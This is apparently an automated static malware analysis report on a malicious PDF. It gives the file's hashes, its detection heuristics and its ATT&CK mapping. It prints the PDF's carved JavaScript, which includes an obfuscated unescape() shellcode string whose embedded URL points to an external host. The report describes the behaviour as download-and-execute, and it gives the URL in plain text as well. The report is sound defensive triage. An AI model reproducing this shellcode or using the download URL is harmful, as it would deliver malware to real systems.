Malicious PDF — malware analysis report

Static analysis result for SHA-256 370899a0853aeb51…

Verdict: MALICIOUS
File type: PDF
Size: 2.6 KB
First seen: 2026-05-10
MD5: 19a9f17d267b0d2efcd4c81dc15d81d6
SHA-1: 3fc08e499768c25b33f9412766d537d23ceb3a86
SHA-256: 370899a0853aeb516495b98bf38a445fbe63303139f40a84df93d66ea7fc7d45
Risk score: 190

Malware Insights

MITRE ATT&CK
T1059.007 Scripting: JavaScript

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The presence of a PDF_UNESCAPE call suggests that the JavaScript may be obfuscated to hide its malicious intent. The script's purpose is likely to download and execute a second-stage payload or exploit a known PDF vulnerability. No specific family could be identified due to the lack of further indicators.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9999

Heuristics (6)

  • JavaScript action (severity: low; 3 related findings; rule PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
      var self = this;
      var sc = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a9 …
  • PDF exploit shellcode contains an embedded download URL (severity: high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL)
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream (severity: low; rule PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info; rule EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info; rule EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://121.101.216.203/bu1/news.php?dd=OkExQXtfczN4c3RyOjI0S1RBZTZ1QmVwJSQ2TzFsMC9FMDVGWDhYImIrInFnXW1xQnVhVHUibisyL3NmNzlZTWl2WyJTdVJbbDE7LDY7Il (referenced by PDF JavaScript)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0013_001.js
Kind: pdf-javascript-stream
Source: PDF /JS object 13 at offset 0x3C5
Size: 1659 bytes
SHA-256: 9f7047d00b5b259f3ee0712a6d315ba21302f791cd0acafcd1c1eed94a8a3eb2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Script preview (first 1,000 lines of the extracted script):
function UGdikpUs6PZuKnwyAc48hFBm(){
  Function.prototype.bind = function(c) {
    var f=this;
    return function() {f.apply(c);}
  };
  function bB0vKHWiMjSq()
{
  var self = this;
  var sc = unescape("%u10eb%u4a5a%uc933%ub966%u013c%u3480%u990a%ufae2%u05eb%uebe8%uffff%u70ff%u994c%u9999%ufdc3%ua938%u9999%u1299%u95d9%ue912%u3485%ud912%u1291%u1241%ua5ea%ued12%ue187%u6a9a%ue712%u9ab9%u1262%u8dd7%u74aa%ucecf%u12c8%u9aa6%u1262%uf36b%uc097%u3f6a%u91ed%uc6c0%u5e1a%udc9d%u707b%uc6c0%u12c7%u1254%ubddf%u5a9a%u7848%u589a%u50aa%u12ff%u1291%u85df%u5a9a%u7858%u9a9b%u1258%u9a99%u125a%u1263%u1a6e%u975f%u4912%u9df3%u71c0%u99c9%u9999%u5f1a%ucb94%u66cf%u65ce%u12c3%uf341%uc098%ua471%u9999%u1a99%u8a5f%udfcf%ua719%uec19%u1963%u19af%u1ac7%ub975%u4512%ub9f3%u66ca%u75ce%u9d5e%uc59a%ub7f8%u5efc%u9add%ue19d%u99fc%uaa99%uc959%ucac9%uc9cf%uce66%u1265%uc945%u66ca%u69ce%u66c9%u6dce%u59aa%u1c35%uec59%uc860%ucfcb%u66ca%uc34b%u32c0%u777b%u59aa%u715a%u66bf%u6666%ufcde%uc9ed%uf6eb%ud8fa%ufdfd%ufceb%ueaea%ude99%uedfc%ue0ca%uedea%uf4fc%uf0dd%ufceb%uedfa%uebf6%ud8e0%uce99%uf7f0%ue1dc%ufafc%udc99%uf0e1%ucded%uebf1%uf8fc%u99fd%uf6d5%ufdf8%uf0d5%uebfb%uebf8%ud8e0%uec99%uf5eb%uf6f4%u99f7%ucbcc%uddd5%ueef6%uf5f7%uf8f6%ucdfd%udff6%uf5f0%ud8fc%u6899%u7474%u3a70%u2f2f%u3231%u2e31%u3031%u2e31%u3132%u2e36%u3032%u2f33%u7562%u2f31%u656e%u7377%u702e%u7068%u643f%u3d64%u6b4f%u7845%u5851%u6674%u7a63%u344e%u3363%u7952%u6a4f%u3049%u3153%u4252%u545a%u315a%u6d51%u7756%u534a%u3251%u7a54%u7346%u434d%u4639%u444d%u4756%u4457%u5968%u6d49%u7249%u6e49%u6e46%u5758%u7831%u6e51%u6856%u4856%u6955%u6962%u7973%u334c%u6d4e%u7a4e%u5a6c%u5754%u326c%u7957%u544a%u5664%u624a%u4462%u3745%u444c%u3759%u6c49%u4